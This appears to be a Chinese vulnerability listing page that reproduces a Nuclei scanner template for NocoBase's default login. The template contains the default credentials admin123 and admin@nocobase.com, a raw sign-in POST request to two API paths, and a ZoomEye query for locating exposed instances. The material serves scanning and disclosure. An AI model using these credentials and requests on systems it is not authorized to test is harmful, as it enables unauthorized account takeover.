nocobase-default-login: NocoBase - Default Login

日期: 2025-08-01 | 影响软件: NocoBase | POC: 已公开

漏洞描述

NocoBase default login was discovered.

PoC代码[已公开]

id: nocobase-default-login

info:
  name: NocoBase - Default Login
  author: Fur1na, icarot
  severity: high
  description: |
    NocoBase default login was discovered.
  reference:
    - https://www.nocobase.com/
    - https://github.com/nocobase/nocobase
    - https://docs.nocobase.com/welcome/getting-started/installation/docker-compose
  metadata:
    verified: true
    max-request: 2
    zoomeye-query: app="NocoBase"
  tags: default-login,nocobase,vuln

variables:
  username: "admin@nocobase.com"
  password: "admin123"

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"account": "{{username}}", "password": "{{password}}"}

    payloads:
      path:
        - '/api/auth:signIn'
        - '/api/v1/auth/user/signin'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"username":'
          - '"email":'
          - 'systemSettings'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f8333ad6116c640f723006e64babe39e8f2d77f6d3b57e65b9c8084e7dc13b8b022100dcc0135ba542cbacbe03f9e17cb24c39a9e836d0a8b765a784b220511f4e7e07:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/nocobase/nocobase-default-login.yaml

相关漏洞推荐